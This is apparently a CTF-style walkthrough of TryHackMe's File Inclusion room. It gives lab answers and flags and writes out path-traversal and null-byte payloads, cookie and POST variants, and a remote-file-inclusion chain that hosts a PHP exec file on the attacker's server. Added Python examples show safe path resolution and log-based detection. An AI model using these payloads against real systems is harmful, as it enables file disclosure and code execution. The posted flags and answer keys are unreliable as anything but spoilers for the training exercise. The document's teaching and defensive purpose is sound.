Welcome to this walkthrough of the File Inclusion room on TryHackMe. Remember that this post will contain the answers to the questions. I will try to explain every step the best I possibly can, but if you think I am missing something or just want to give me feedback, please leave a comment! Now let's get to the good stuff…
What function causes path traversal vulnerabilities in PHP? To answer this question, we simply have to read through the given text above the question and we will find out that the function that causes path traversal vulnerabilities in PHP is:
file_get_contents
To give a short explanation of path traversal: path traversal, or directory traversal, is when the application passes user input into a vulnerable file-handling function without validating it, which lets the attacker walk into other directories on the server, outside the application's own directory.
Give Lab #1 a try to read /etc/passwd. What would the request URI be?
When we access lab 1, we can see that we can include a file path. If we input /etc/passwd as the question tells us to, the URI will be:
/lab1.php?file=/etc/passwd
In Lab #2, what is the directory specified in the include function?
To find out what directory is specified in the include function, we can give invalid input and make the application spit out an error, which will give us the necessary information. I gave aaa as input and got this error:

In the first warning we can see the argument of the include function, includes/aaa, and this gives us the answer to our question:
includes
Give Lab #3 a try to read /etc/passwd. What does the request look like?
When we first input /etc/passwd, we can see that the application automatically appends .php to the end of our given file name. In the text before the question, we learn that adding a null byte (%00 in the URL, or the raw byte 0x00) terminates the file name early, so the appended part is ignored. Example from TryHackMe:

This means that to read /etc/passwd we have to traverse up the directory tree by using ../ multiple times and then end the file path with a null byte, %00. That makes the request look like this:
/lab3.php?file=../../../../etc/passwd%00
Which function is causing the directory traversal in Lab #4?
Again, by supplying invalid input, we get an error message that tells us exactly which function is being used.

file_get_contents
Try out Lab #6 and check what directory has to be in the input field.
Using the same technique as before, giving invalid input, we get another error message that helps us solve the challenge:

THM-profile
Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?
To read /etc/os-release, first give THM-profile as the first directory, then traverse back out of it again, which will look something like this:
THM-profile/../../../../etc/os-release
This gives us some info about the operating system and the version we need:

12.04
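Labs 2, 3 and 6 all fail for the same reason: the user value is concatenated onto a directory and a suffix and handed straight to the file system. As an added example that is not part of the walkthrough or the room, the Python below emulates that vulnerable lookup (including why a null byte drops the appended .php) next to a resolver that refuses it: NUL bytes are rejected, the suffix is applied before resolving, and the fully resolved path must still sit under the base directory. The base directory /srv/app/includes and the names legacy_resolve and safe_resolve are my own constructions; the "must start with THM-profile" rule mirrors Lab #6 and shows that a prefix check alone does not stop ../ from walking back out.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed base directory for the examples; it does not need to exist.
BASE_DIR = "/srv/app/includes"


def legacy_resolve(base_dir: str, user_input: str, suffix: str = ".php") -> str:
    """Emulate the VULNERABLE lookup the labs perform: directory prefix,
    raw user value and fixed suffix are concatenated, and the result is
    cut at the first NUL byte, which is what happens when the string is
    handed to the OS as a NUL-terminated C string. Nothing is validated."""
    raw = base_dir + user_input + suffix
    return raw.split("\x00", 1)[0]


def safe_resolve(base_dir: str, user_input: str, suffix: str = ".php",
                 required_prefix: Optional[str] = None) -> Optional[str]:
    """Return the absolute path to open, or None when the request must be
    refused. NUL bytes are rejected outright, the suffix is added *before*
    resolving (so it cannot be truncated away), and the resolved path has to
    remain inside base_dir, which defeats both '..' and absolute paths."""
    if "\x00" in user_input:
        return None
    # A bare 'must start with THM-profile' check (what Lab #6 relies on) is
    # not sufficient by itself, because '..' components walk back out again;
    # it is kept only to show that the containment check below is what matters.
    if required_prefix is not None and not user_input.startswith(required_prefix + "/"):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_input + suffix))
    # commonpath of base and candidate is base itself only when candidate
    # lives underneath it; an escape yields a shorter shared ancestor.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    lab3 = unquote("../../../../etc/passwd%00")          # what the browser sends, decoded
    print("legacy:", legacy_resolve("includes/", lab3))  # .php has been cut off
    print("safe:  ", safe_resolve(BASE_DIR, lab3))        # None: refused
    print("safe:  ", safe_resolve(BASE_DIR, "THM-profile/../../../../etc/os-release",
                                  suffix="", required_prefix="THM-profile"))  # None
    print("safe:  ", safe_resolve(BASE_DIR, "about"))     # /srv/app/includes/about.php
```

The order of operations is the whole point: appending the suffix and canonicalising with realpath before the containment check means there is no string the caller can supply that ends up outside base_dir, whatever encoding tricks it uses on the way in.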
Capture Flag1 at /etc/flag1
When we visit the first challenge, we are met with this message:

To "fix" this form and get the output we want, we can simply go into the browser dev tools and change the method of the form from GET to POST, then supply /etc/flag1 in the input field, and we get the first flag:
F1x3d-iNpu7-f0rrn
Capture Flag2 at /etc/flag2
In the second challenge we are met with this message:

Taking a look at our cookies, we can see we have a cookie called THM with the value of Guest. If we change it to Admin and reload the page, we can see we have access to the page, but also a couple of errors:

Looks like the application takes the cookie as the file path, and appends .php to the end of the file path. So, to get our flag, we need to traverse up the directories, and add a null byte, all of this done as the value of the cookie, which will look like this:
../../../../etc/flag2%00
Giving us the flag:
c00k13_i5_yuMmy1
Capture Flag3 at /etc/flag3
In this challenge, when I first simply gave /etc/flag3 as input, it came back with this:

Here we can see that the leading / does not get included in the file path, and there is a .php appended at the end. Upon inspecting the website, I saw that the form was using the GET method. When I changed it to POST and sent the request again, it included the /.
When I then tried to use POST as the form method, add a null byte and traverse up the directories, it still did not work. So I put the request through Burp and saw that there is a cookie from the previous challenge, and a token with the file path. I changed both to ../../../../etc/flag3%00

This finally gave me the answer to this question:
P0st_1s_w0rk1in9
Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
To gain RCE with RFI, we have to host a malicious file on our own web server, and then supply the server's IP and port plus the path to that file as the value of the include parameter.
First I created the malicious file with this command:
echo '<?php echo exec("hostname") ?>' > maliciousfile.php
Then I set up an HTTP server on my AttackBox to host the malicious file with this command:
python3 -m http.server --bind <ATTACKBOX-IP> <PORT>
Now that everything was ready to deliver the attack, I went back to the playground page and delivered this as the file:
http://10.10.98.195:9001/maliciousfile.php
This gave me the final answer in this room which is:
lfi-vm-thm-f8c5b1a78692
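Every request in this room leaves a recognisable trace: an absolute path, ../ sequences, an encoded null byte, or a full http:// URL in the include parameter, whether it travels in the query string, in the THM cookie or in a POST body. As an added example that is not part of the walkthrough, the Python below runs that detection over a handful of constructed proxy-style log lines modelled on the requests above. The log format (IP, method, target, then the Cookie header and POST body in quotes), the /challenge2.php and /challenge3.php paths and the 10.0.0.x client addresses are my own assumptions; a plain web server access log would not record cookies or bodies, which is exactly why the cookie and POST variants in this room slip past query-string-only alerting.

```python
import re
from typing import List, Set, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed log lines (not real captures) modelled on this walkthrough's
# requests: "<ip> <method> <target> cookie="<Cookie header>" body="<POST body>"".
SAMPLE_LOG = """\
10.0.0.5 GET /lab1.php?file=/etc/passwd cookie="" body=""
10.0.0.5 GET /lab3.php?file=../../../../etc/passwd%00 cookie="" body=""
10.0.0.5 GET /challenge2.php cookie="THM=../../../../etc/flag2%00" body=""
10.0.0.5 POST /challenge3.php cookie="THM=Guest" body="file=../../../../etc/flag3%00"
10.0.0.5 GET /playground.php?file=http://10.10.98.195:9001/maliciousfile.php cookie="" body=""
10.0.0.9 GET /lab1.php?file=about cookie="THM=Guest" body=""
""".splitlines()

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) (?P<method>\S+) (?P<target>\S+) '
    r'cookie="(?P<cookie>[^"]*)" body="(?P<body>[^"]*)"$'
)

Hit = Tuple[str, str, str, str, str, Tuple[str, ...]]  # ip, method, path, source, param, findings


def classify_value(value: str) -> Set[str]:
    """Labels for one user-controlled value that could reach an include call."""
    # Query/body values are already decoded by parse_qsl; cookie values arrive raw.
    # Decoding once more is harmless and also catches double-encoded payloads.
    decoded = unquote(value)
    findings = set()
    if "\x00" in decoded:
        findings.add("null_byte")        # %00 truncation trick (Lab #3, Flag2, Flag3)
    if "../" in decoded or "..\\" in decoded:
        findings.add("traversal")        # walking out of the include directory
    if re.match(r"(https?|ftp)://", decoded, re.I):
        findings.add("remote_include")   # RFI: file fetched from another host
    if decoded.startswith("/"):
        findings.add("absolute_path")    # e.g. /etc/passwd straight into the parameter
    return findings


def extract_params(method: str, target: str, cookie: str, body: str) -> List[Tuple[str, str, str]]:
    """All (source, name, value) triples an include parameter could hide in."""
    params = []
    for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        params.append(("query", k, v))
    for part in cookie.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            params.append(("cookie", k, v))
    if method.upper() == "POST" and body:
        for k, v in parse_qsl(body, keep_blank_values=True):
            params.append(("body", k, v))
    return params


def scan_log(lines: List[str]) -> List[Hit]:
    """Return one hit per suspicious parameter value; lines that do not match the format are skipped."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        for source, name, value in extract_params(m["method"], m["target"], m["cookie"], m["body"]):
            findings = classify_value(value)
            if findings:
                hits.append((m["ip"], m["method"], path, source, name, tuple(sorted(findings))))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Run as-is it prints five hits and nothing for the benign file=about request; the Flag2 and Flag3 lines are flagged only because the cookie and body were captured, so the practical takeaway is to log (or inspect at the proxy) every channel the application reads the include value from, not just the URL.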

Thank you for taking the time to read this walkthrough. I hope you got something out of this, because I definitely did. As I said, if you have any feedback or comments, I will be more than happy to read them, so leave them down below! See you in the next one!